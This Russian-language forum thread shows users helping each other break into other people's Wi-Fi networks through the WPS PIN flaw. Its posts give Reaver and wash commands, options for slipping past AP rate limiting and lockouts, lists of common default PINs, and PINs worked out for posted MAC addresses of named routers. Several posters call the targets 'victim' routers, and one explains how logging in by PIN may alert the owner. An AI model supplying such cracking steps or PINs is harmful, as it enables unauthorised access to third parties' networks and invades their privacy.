http://i52.fastpic.ru/thumb/2013/0311/f2/74ea3dade60c0f2296233fd15b9f4af2.jpeg
При просмотре через обычный адаптер этих точек или вообще не видно, или сигнал очень слабый, т.е. они находятся за 100 метров примерно.
Так как я не особо сведущ в wifi, возникает вопрос: может ли быть такое, что роутер жертвы не может выдать хороший сигнал для стабильной скорости. Или стоит лезть в настройки роутера? Подскажите чайнику
buruznyk
11.03.2013, 18:39
может ли быть такое, что роутер жертвы не может выдать хороший сигнал для стабильной скорости. Или стоит лезть в настройки роутера?
Для нормальной работы ALFA AWUS 036H сигнал от роутера, при сканировании командой wash, входящей в состав ривера, должен быть до 66 db ,при 67 и слабее,интернет соединение будет не стабильным.
Для нормальной работы ALFA AWUS 036H сигнал от роутера, при сканировании командой wash, входящей в состав ривера, должен быть до 66 db ,при 67 и слабее,интернет соединение будет не стабильным.
На первом роутере сигнал -56, -60 максимум, т.е. скорее дело в чём-то другом?
на втором -66, но на нём сейчас даже стабильнее скорость, как мне кажется.
Возможно на первом стоит ограничение по мак-адресу?
Dovbnyak
11.03.2013, 19:12
На первом роутере сигнал -56, -60 максимум, т.е. скорее дело в чём-то другом?
на втором -66, но на нём сейчас даже стабильнее скорость, как мне кажется.
Возможно на первом стоит ограничение по мак-адресу?
Такая фигня встречается на чипе RTL8187 У самого стоит RTL 8187L иногда есть непонятн... глюки не хочет конектить итд... попробуй снять галочку в програме Virtual Wi-fi И поменяй в настройках адаптера схему канала или поменяй на роутере канал на 1 чем више канал тем слабее сигнал пробивается через стен.... ну я думаю все понятно можно попробовать сменить канал и только ) может помочь но мало вероятно )
BC:F6:85:4A:6F:92
После пяти подборов, лимит. Пробовал в WiFiSlax подобрать WPSPinGenerator'ом, 48782265 не подошел. В WPSPin 1.0.5 и WPScrackGUI, ничего нет. Подберите что нибудь по mac'у.
fuckirina
12.03.2013, 04:31
Может кто знает пин от мака 00:0C:C30:68:CC
- а что такие существуют?...научись создавать сообщения сначало...
fuckirina
12.03.2013, 04:37
BC:F6:85:4A:6F:92
После пяти подборов, лимит. Пробовал в WiFiSlax подобрать WPSPinGenerator'ом, 48782265 не подошел. В WPSPin 1.0.5 и WPScrackGUI, ничего нет. Подберите что нибудь по mac'у.
- пробуй самые популярные: 46264848 76229909 18534207 ...если не подойдут запускай Reaver на перебор...
buruznyk
12.03.2013, 09:56
BC:F6:85:4A:6F:92
После пяти подборов, лимит
Попробуй так reaver -i mon0 -b 00:00:00:00:00:00 -c xx -e xxxxxx -r 4:30
мне попался один заблокированный АР .Какую команду нужно дать риверу, чтоб взломать блокировку АP ?
никакой командой не поможешь, я читал что нужно использовать MDK 3 которая может ребутнуть роутер и вообще напакостить много, если у тебя Ap Rate Limiting но все таки проскакивают PINы в течении часа, то эту точку в конце концов можно вскрыть. Мой рекорд 8.5 дней бук не выключался, Брутил пинами с большим интервалом между (AP Rate Limiting)
http://forum.antichat.ru/thread336191.html
А у меня такая ситуация: reaver подобрал к точке WPS PIN, a WPA ключа нет Как можно с этим бороться?
+ Pin cracked in 17 seconds
+ WPS PIN 'xxxxxxxx'
+ Nothing done, nothing to save
вот, как-то так в итоге получается....
А у меня такая ситуация: reaver подобрал к точке WPS PIN, a WPA ключа нет Как можно с этим бороться?
Запусти ривер несколько раз, указав в его параметрах подобранный пин, чтобы только он и перебирался. С раза пятого-десятого точка что-то да отдаст
Однако, скорее всего, в результате ты получишь в качестве PSK 64-значную абракадабру, которую нельзя будет использовать в качестве пароля
Запусти ривер несколько раз, указав в его параметрах подобранный пин, чтобы только он и перебирался. С раза пятого-десятого точка что-то да отдаст
Однако, скорее всего, в результате ты получишь в качестве PSK 64-значную абракадабру, которую нельзя будет использовать в качестве пароля
Утешительно А можно как-нибудь на рутер зайти, предварительно присоединившись к ТД через ПИН?
Утешительно А можно как-нибудь на рутер зайти, предварительно присоединившись к ТД через ПИН?
На роутер по пину зайти можно,но надо четко понимать зачем тебе это надо. Дело в том,что скорее всего,при входе через пин роутер будет переконфигурирован, сменится пароль и название точки доступа. Например,так себя ведут роутеры тплинк. Естественно, сам хозяин на такой роутер зайти уже не сможет,и его это как минимум насторожит
В итоге все заканчивается тем,что хозяин,решив что его роутер просто глюканул, возвращает на место свои старые настройки-имя точки и пароль. И ты снова оказываешься в самом начале пути-у тебя есть пин от точки, но пароля ты не знаешь...
В общем, для начала ты добейся результата от ривера-он либо должен отдать пароль,либо 64значную абракадабру.
На роутер по пину зайти можно,но надо четко понимать зачем тебе это надо. Дело в том,что скорее всего,при входе через пин роутер будет переконфигурирован, сменится пароль и название точки доступа. Например,так себя ведут роутеры тплинк. Естественно, сам хозяин на такой роутер зайти уже не сможет,и его это как минимум насторожит
В итоге все заканчивается тем,что хозяин,решив что его роутер просто глюканул, возвращает на место свои старые настройки-имя точки и пароль. И ты снова оказываешься в самом начале пути-у тебя есть пин от точки, но пароля ты не знаешь...
В общем, для начала ты добейся результата от ривера-он либо должен отдать пароль,либо 64значную абракадабру.
Спасибо!!! Совет сработал: выдал нормальный пароль, правда, после 8 раза
всем привет. Ребята, помогите доламать сеть. Доходит до 99,99% и крутит на пине 60739988 всё время. Пробовал по новой запускать реавер с этим пином, он крутит этот пин начиная с 90,05% и проценты растут, а пин тот-же. И ещё, кто-то писал, что можно попробовать подключиться по пину, у меня RTL8187L и я там такого не нахожу. Заранее спасибо.
всем привет. Ребята, помогите доламать сеть. Доходит до 99,99% и крутит на пине 60739988 всё время. Пробовал по новой запускать реавер с этим пином, он крутит этот пин начиная с 90,05% и проценты растут, а пин тот-же. И ещё, кто-то писал, что можно попробовать подключиться по пину, у меня RTL8187L и я там такого не нахожу. Заранее спасибо.
Начни перебор заново с 6060хххх пина. Я в этой теме писал несколькими страницами ранее, как это правильно сделать. Если на 6073 резко перескочит на 90% - значит первая половина подобралась верно, пусть тогда перебирает дальше. Если же эту цифру проскочит, и пойдет дальше 6074 6075 итд - тогда начинай перебор с самого начала.
Пытаться подключаться по пину не нужно, т.к. ты пока даже не знаешь, какой пин правильный...
Я уже два раза сканировал с нуля и всё то-же повторяется, не проскакивает, а если вбить этот пин, то проценты растут, пин тот-же и каждый раз в конце процентов пишет WARNING: Receive timeout occurred
Я уже два раза сканировал с нуля и всё то-же повторяется, не проскакивает, а если вбить этот пин, то проценты растут, пин тот-же и каждый раз в конце процентов пишет WARNING: Receive timeout occurred
Я сталкивался с таким, сложно сказать в чем там проблема, готового рецепта для таких точек у меня нет.
По пину можно подключиться, используюя программу qss. Ссылки были в ветке вопрос-ответ. Также будь готов к тому, что точка, после входа через пин, возможно(!), будет автоматически переконфигурирована.
подскажет пин от мака
90:F6:52:B5:9C:35
TP-Link
http://4.firepic.org/4/images/2013-03/18/rcij8ub4idxq.png
fuckirina
19.03.2013, 06:43
подскажет пин от мака
90:F6:52:B5:9C:35
TP-Link
- а вот другие пин-генераторы\калькуляторы требуют вводить не первые а последние 6 знаков мака...
- соответственно и пин другой выдают-19020051
читаем шапку ! за оф бан , не по теме вопрос - аналогично бан!
Подскажите пожалуйста.
Сначала точка ломалась нормально, отлично шёл подбор, как нашёл первую часть - пошли пакеты m5 m6, но после - ни 1 коннекта к точке, т.е. коннект-то есть, но после пакета m6:
Sending WSC NACK
WPS transaction failed (code: 0x03), re-trying last ping
так и крутиться на 1 пине.
Что это? Защита какая-то на точке что ли?
d1nk3r, скорее всего "подвис" wps на точке, после её перезагрузки пойдет... Вероятно еще ухудшение сигнала-переместили её, накрыли чем-то
d1nk3r, скорее всего "подвис" wps на точке, после её перезагрузки пойдет... Вероятно еще ухудшение сигнала-переместили её, накрыли чем-то
Это навряд ли, потому что когда запускаю перебор сначала - он идёт нормально. В чём подвох?
buuubliiik
28.03.2013, 01:13
Можешь параллельно включить wireshark и посмотреть, что происходит?
Можешь параллельно включить wireshark и посмотреть, что происходит?
Блин, так и думал, что когда-нибудь придётся разбираться в этой проге. Что конкретно там можно увидеть?
buuubliiik
28.03.2013, 02:22
Если повезет - увидишь как работает взломщик, что он отправляет и что приходит обратно. По идее должно работать.
Да: это не "нажми на кнопку - получишь результат".
fuckirina
28.03.2013, 04:22
Подскажите пожалуйста.
Сначала точка ломалась нормально, отлично шёл подбор, как нашёл первую часть - пошли пакеты m5 m6, но после - ни 1 коннекта к точке, т.е. коннект-то есть, но после пакета m6:
Sending WSC NACK
WPS transaction failed (code: 0x03), re-trying last ping
так и крутиться на 1 пине.
Что это? Защита какая-то на точке что ли?
- смотри тут может что и найдёшь для себя... https://code.google.com/p/reaver-wps/issues/list
dimon654
28.03.2013, 13:55
Всем привет!
Подскажите, может у кого такое было.
Получил пин и пароль от точки, но с помощью ни того ни другого не могу подключиться, появляется сообщение о неверном пароле. Я так понял если бы была фильтрация по мак то было бы сообщение просто о невозможности подключения. Роутер походу мтс. Имя сети UniversalRouterMTS2750. С дугими точками таких проблем не было.
- смотри тут может что и найдёшь для себя... https://code.google.com/p/reaver-wps/issues/list
Спасибо за ссылку.
Короче решил эту проблему таким способом: поставил -N -E опции и каждую ~20 попытку пин проскакивал)))
сдалась таки точка, но всё равно интересно что же это, если у кого было такое, отпишитесь
fuckirina
28.03.2013, 21:24
Спасибо за ссылку.
Короче решил эту проблему таким способом: поставил -N -E опции и каждую ~20 попытку пин проскакивал)))
сдалась таки точка, но всё равно интересно что же это, если у кого было такое, отпишитесь
- не за что...
- ну ты же там по ссылке видел-много причин...это могло быть у каждого своё...
Ihfiniti05
02.04.2013, 15:58
после ввода команды wash -i mon1 -C
Появляються надписи BSSID и другие вот точку доступа ни как не находитю. Почему?
нодо писать wash -i mon0 -C -s
Ihfiniti05
02.04.2013, 17:59
нодо писать wash -i mon0 -C -s
ничего не вышло все равно также стоит ни одну точну не находит. Пытаюсь для опыта свой роутер нетгиар взломать.
Адаптер вай-фай у меня на чипсет Atheros AR9287
ничего не вышло все равно также стоит ни одну точну не находит. Пытаюсь для опыта свой роутер нетгиар взломать.
Адаптер вай-фай у меня на чипсет Atheros AR9287
Купи выносной адаптер USB. Может нет у тебя сетей которые подерживуют WPS. зашифрованы только WPA2.
Ihfiniti05
02.04.2013, 18:37
У меня ройтер NETGEAR JNR3210-100RUS
WEP
WPA-PSK [TKIP]
WPA2-PSK [AES]
WPA-PSK [TKIP] + WPA2-PSK [AES]
WPA/WPA2 Enterprise
Пытаюсь его взломать. Сейчас галочка стоит на WPA2-PSK [AES].
и есть TP-LINK TL-WN821N Wireless N USB Adapter(802.11b / g / n, USB2.0) перенасной подерживает WPA2-PSK; WPA-PSK; WPA2; WPA; WEP-кодирование с 64-, 128- или 152-битным ключом
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot